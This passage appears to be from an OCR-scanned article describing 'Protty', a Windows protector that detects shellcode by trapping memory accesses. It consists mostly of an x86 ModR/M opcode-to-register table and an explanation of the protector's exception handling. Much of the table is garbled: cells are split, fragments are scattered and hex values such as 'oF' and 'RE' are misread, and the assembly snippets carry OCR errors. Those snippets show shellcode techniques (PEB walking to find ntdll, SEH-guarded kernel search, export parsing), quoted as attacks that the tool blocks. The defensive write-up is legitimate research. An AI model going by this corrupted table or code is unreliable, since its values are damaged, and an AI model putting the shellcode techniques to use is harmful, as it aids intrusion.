AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 71 A [disp8+ECX], ESI/SI/D 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A a: A [disp8+EDX], ESI/SI/DH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 73 A [disp8+EBX], ESI/SI/D 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 74 A [disp8+[--][--]], ESI/SI/DH 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 75 A [disp8+EBP], ESI/SI/D 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 16 A [disp8+ESI], ESI/SI/DB 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 77 A [disp8+EDI], ESI/SI/D 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 78 A [disp8+EAX], EDI/DI/B 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 79 A [disp8+ECX], EDI/DI/B 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 7A A [disp8+EDX], EDI/DI/B 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 7B A [disp8+EBX], EDI/DI/BH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A ¥E A [disp8+[--][--]], EDI/DI/BH 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
disp8+tESI], 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


A 


7D 


TE 
ay 


TE 


A 


A 


A 


disp8+EBP], 


z5 


\DI/DI/BH 


r5 


\DI/DI/BH 


disp8tE 


DI], 


5 


\DI/DI/BH 


AAAAAAAAAAAAAAAAA 


AAAAAAAAAAAAAAAAA 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


80 


A 


disp32+ 


EAX], 


EAX/AX/AI 


Li 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


81 


A 


disp32+ 


ECX], 


EAX/AX/AI 


Li 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


82 


A 


disp32+ 


EDX], 


EAX/AX/AL 


Li 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
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A 83 A [disp32+EBX], EAX/AX/AL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAABAADA 
A 84 A [disp32+[--][--]], EAX/AX/AL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAADA 
A 85 A [disp32+EBP], EAX/AX/AL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 86 A [disp32+ESI], EAX/AX/AL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 87 A [disp32+EDI], EAX/AX/AL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 88 A [disp32+EAX], ECX/CX/CL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 89 A [disp32+ECX], ECX/CX/CL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAABAADA 
A 8A A [disp32+EDX], ECX/CX/CL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADA 
A 8B A [disp32+EBX], ECX/CX/CL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


8C 


A 


disp324 


+ [-- 


[--]], 


ECX/CX/CL 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 8D A [disp32+EBP], ECX/CX/CL 
A AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 8E A [disp32+ESI ECX/CX/CL 
A AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 8F A [disp32+EDI ECX/CX/CL 
A AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 90 A [disp32+EAX], EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 91 A [disp32+ECX], EDX/DX/DL 
A AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 92 A [disp32+EDX], EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 93 A [disp32+EBX], EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 94 A [disp32+[--][--]], EDX/DX/DL 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 95 A [disp32+EBP], EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 96 A [disp32+ESI EDX/DX/DL 
A AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 97 A [disp32+EDI EDX/DX/DL 
A AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 98 A [disp32+EAX], EBX/BX/BL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 99 A [disp32+ECX], EBX/BX/BL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A oA A [disp32+EDX], EBX/BX/BL 
A AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 9B A [disp32+EBX], EBX/BX/BL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 9C A [disp32+[--][--]], EBX/BX/BL 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 9D A [disp32+EBP], EBX/BX/BL 
A AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A oF A [disp32+ESI], EBX/BX/BL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A oF A [disp32+EDI EBX/BX/BL 
A AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A AO A [disp32+EAX], ESP/SP/AH 
A AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A Al A [disp32+ECX], ESP/SP/AH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A A2 A [disp32+EDX], ESP/SP/AH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A A3 A [disp32+EBX], ESP/SP/AH 
A AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


A4 


A 


disp324 


t+ [-- 


[oS] le 


ESP/SP/AH 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
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A 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
disp32+k 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
disp32+kE 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
disp32+k 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
disp32+kE 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
disp32+kE 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
disp32+k 


A 


A 


A 


A 


A 


A 
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A5 


A6 
A7 
A8 
AQ 
AA 


AB 


A 


A 


A 


A 


A 


A 


A 


24 


disp32+k 


P/AH 


AAAAAAAAAAAAAAAAAAAAAA 


P/AH 


AAAAAAAAAAAAAAAAAAAAAA 


P/AH 


AAAAAAAAAAAAAAAAAAAAAA 


P/CH 


AAAAAAAAAAAAAAAAAAAAAA 


P/CH 


AAAAAAAAAAAAAAAAAAAAAA 


P/CH 


AAAAAAAAAAAAAAAAAAAAAA 


P/CH 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A AC A [disp32+[--][--]], EBP/BP/CH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


AD 


A 


disp32+ 


EBP 


EBP/B 


P/CH 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


AE 
E 


A 


disp32+ 


ESI 


Ty 


EBP/B 


P/CH 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


AF 


A 


EDI 


disp32+ 


EBP/B 


P/CH 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


BO 


A 


BAX 


disp32+ 


ESI/SI/D 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


Bl 


ESI/SI/D 


A A [disp32+ECX], 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAA 
A B2 A [disp32+EDX], ESI/SI/D 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A B3 A [disp32+EBX], ESI/SI/D 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A B4 A [disp32+[--][--]], ESI/SI/DH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAA 
A B5 A [disp32+EBP], ESI/SI/D 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A B6 A [disp32+ESI], ESI/SI/DH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A B7 A [disp32+EDI], ESI/SI/D 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAA 
A B8 A [disp32+EAX], EDI/DI/BH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAA 
A BO A [disp32+ECX], EDI/DI/B 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A BA A [disp32+EDX], EDI/DI/BH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A BB A [disp32+EBX], EDI/DI/B 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A BC A [disp32+[--][--]], EDI/DI/BH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A BD A [disp32+EBP], EDI/DI/BH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A BE A [disp32+ESI], EDI/DI/BH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A BF A [disp32+EDI], EDI/DI/BH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A ol) A EAX/AX/AL, EAX/AX/AL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A fen A ECX/CX/CL, EAX/AX/AL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAA 
A C2 A EDX/DX/DL, EAX/AX/AL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAA 


A 


C3 


A 


EBX/BX/BL, 


EAX/AX/AlI 


Ly 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


C4 


A 


ESP/SP/A 


H, 


EAX/AX/AI 


Li 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


(Ore) 


A 


EBP/BP/C 


H, 


EAX/AX/A 


A 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


C6 


A 


ESI/SI/D 


H, 


EAX/AX/AI 


Li 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
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A C7 A EDI/DI/BH, EAX/AX/AL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A C8 A EAX/AX/AL, ECX/CX/CL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAAAAA 
A C9 A ECX/CX/CL, ECX/CX/CL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A CA A EDX/DX/DL, ECX/CX/CL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A CB A EBX/BX/BL, ECX/CX/CL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A ale A ESP/SP/AH, ECX/CX/CL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A CD A EBP/BP/CH, ECX/CX/CL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A CE A ESI/SI/DH, ECX/CX/CL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A CF A EDI/DI/BH, ECX/CX/CL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A DO A EAX/AX/AL, EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A D1 A ECX/CX/CL, EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A D2 A EDX/DX/DL, EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A D3 A EBX/BX/BL, EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAAAAA 
A D4 A ESP/SP/AH, EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A D5 A EBP/BP/CH, EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A D6 A ESI/SI/DH, EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A D7 A EDI/DI/BH, EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAA 
A D8 A EAX/AX/AL, EBX/BX/BL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A D9 A ECX/CX/CL, EBX/BX/BL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


A 


DA 


DB 


A 


A 


EDX/DX/DL, 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
EBX/BX/BL, 


EBX/BX/B 


EBX/BX/BI 


a Br 


Li 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A DC A ESP/SP/AH, EBX/BX/BL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A DD A EBP/BP/CH, EBX/BX/BL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A DE A ESI/SI/DH, EBX/BX/BL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A DF A EDI/DI/BH, EBX/BX/BL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A EO A EAX/AX/AL, ESP/SP/AH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAAAAA 
A El A ECX/CX/CL, ESP/SP/AH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A E2 A EDX/DX/DL, ESP/SP/AH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A E3 A EBX/BX/BL, ESP/SP/AH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A E4 A ESP/SP/AH, ESP/SP/AH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A E5 A EBP/BP/CH, ESP/SP/AH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A E6 A ESI/SI/DH, ESP/SP/AH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A E7 A EDI/DI/BH, ESP/SP/AH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A E8 A EAX/AX/AL, EBP/BP/CH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
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A E9 A ECX/CX/CL, EBP/BP/CH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A EA A EDX/DX/DL, EBP/BP/CH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A EB A EBX/BX/BL, EBP/BP/CH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A EC A ESP/SP/AH, EBP/BP/CH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAA 
A ED A EBP/BP/CH, EBP/BP/CH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A RE A ESI/SI/DH, EBP/BP/CH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A EF A EDI/DI/BH, EBP/BP/CH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A FO A EAX/AX/AL, ESI/SI/DH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A Fl A ECX/CX/CL, ESI/SI/DH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A F2 A EDX/DX/DL, ESI/SI/DH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A F3 A EBX/BX/BL, ESI/SI/DH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A F4 A ESP/SP/AH, ESI/SI/DH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAA 
A F5 A EBP/BP/CH, ESI/SI/DH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A F6 A ESI/SI/DH, ESI/SI/DH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A F7 A EDI/DI/BH, ESI/SI/DH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A F8 A EAX/AX/AL, EDI/DI/BH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A F9 A ECX/CX/CL, EDI/DI/BH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A FA A EDX/DX/DL, EDI/DI/BH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A FB A EBX/BX/BL, EDI/DI/BH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A FC A ESP/SP/AH, EDI/DI/BH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A FD A EBP/BP/CH, EDI/DI/BH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A FE A ESI/SI/DH, EDI/DI/BH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A FF A EDI/DI/BH, EDI/DI/BH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


As you can see 03h covers "[EBX], EAX/AX/AL". And that’s the thing we 
needed.Now mechanism knows it should scan EAX and EBX registers and update 
them if their values are "Similiar" to address of "DECOYS". Of course the 
register checking method could be mor fficient (should also check more 
opcodes etc. etc.) maybe in next versions. 

In the mechanism i have used the table listed above, anyway there is also 
"another" ("primary") way to determine what registers are used. The way is 


based on fact that ModR/M byte contains three fields of information (Mod, 
Reg/Opcode, R/M). By checking bits of those entries we can determine what 


registers are used by the instruction (surely interesting tables from 
Intel manuals: "...Addressing Forms with the ModR/M Byte") I’m currently 


working on disassembler engine, so all those codes related to "opcode 


decoding" topic should be released in the nearest future. And probably if 
Protty project will be continued i will exchange the zOmbie dissassembler 
engine with my own, anyway his baby works very well. 


If you are highly interrested in disassembling the instructions, 


[8]. 


check the 
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To see how it works, check following example: 


; SNIP 

mov eax, fs: [30h] 

mov eax, [eaxt+0Och] 

mov esi, [eaxtich] ; value changed by protector, ESI=DDDDDDDDh 
lodsd ; load one dword <- causes exception 

; SNIP 


This example faults on "lodsd" instruction, because application is trying 
to load 4 bytes from invalid location - ESI (because it was changed by 
P2). 


Prevention library takeovers th xception and checks the instruction. 
This one is "lodsd" so instead of ModR/M byte (because there is no such 
here) library checks the opcode. When it finds out it is "lodsd" 
instruction, it scans and updates ESI. Finally the ESI (in this case) is 
rewritten to 0241F28h (original) and the execution is continued including 
the "BAD" instruction. 


So that’s how P2 works, a lot faster then its older brother Pl. 


== [| Wes Action - few samples of catched shellcodes 


If you have studied descriptions of all of the mechanisms, it is 
time to show where/when Protty prevents them. 


Lets take a look at examples of all mechanisms described in paragraph IV. 


PEB (Process Environment Block) parsing 


; SNIP 
mov eax,dword ptr fs: [30h] ; EAX is now PEB base 
mov eax,dword ptr [eaxtOch] ; EAX+0Ch = PEB_LDR_DATA 
mov esi,dword ptr [eax+lch] ; get the first entry 

| 

---- [P1-I1] 
mov ebx, [esit08h] ; EBX=ntdll imagebase 


AKRRKRKKRAKRAKAAKRAARAKAAAA 


<rest code of PEB parser> 
; SNIP 


- Description for Pl 


In this example Protty catches the shellcode when the instruction marked 
as [P1-I1] is executed. Since Protty has protected the PEB_LDR_DATA 
region (it’s marked as PAGE _NOACCESS) all references to it will 

cause an access violation which will be filtered by Protty. 

Here, shellcode is trying to get first entry from PEB_LDR_DATA structure, 
this causes an exception and this way shellcode is catched - attack 


failed. 


- Description for P2 


The mechanism is being activated when [P2-I1] instruction is being 
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executed. ESI value is redirected to invalid location so every 
reference to it cause an access violation exception, this is 
filtered by the installed prevention mechanism - in short words: 
attack failed, shellcode was catched. 


searching for kernel in memory 


I think here code is not needed, anyway when/where protty will act in 
this case? As you probably remember from paragraph IV the 

kernel search code works together with SEH (structured exception handler) 
frame. Everytime shellcode tries invalid location SEH frame handles the 
exception and the search procedure is continued. When Protty is active 
shellcode doesn’t have any "second chance" - what does it mean? It means 
that when shellcode will check invalid location (by using SEH) the 
exception will be filtered by Protty mechanism, in short words shellcode 
will be catched - attack failed. 


There are also some shellcodes that search the main shellcode in memory 
also using SEH frames. Generally the idea is to develop small shellcode 
which will only search for the main one stored somewhere in memory. Since 
here SEH frames are also used, such type of shellcodes will be also 
catched. 


export section parsing 


We are assuming that the attacker has grabbed the imagebase in unknown 
way :) (full code in IV-th chapter - i don’t want to past it here) 


; SNIP 
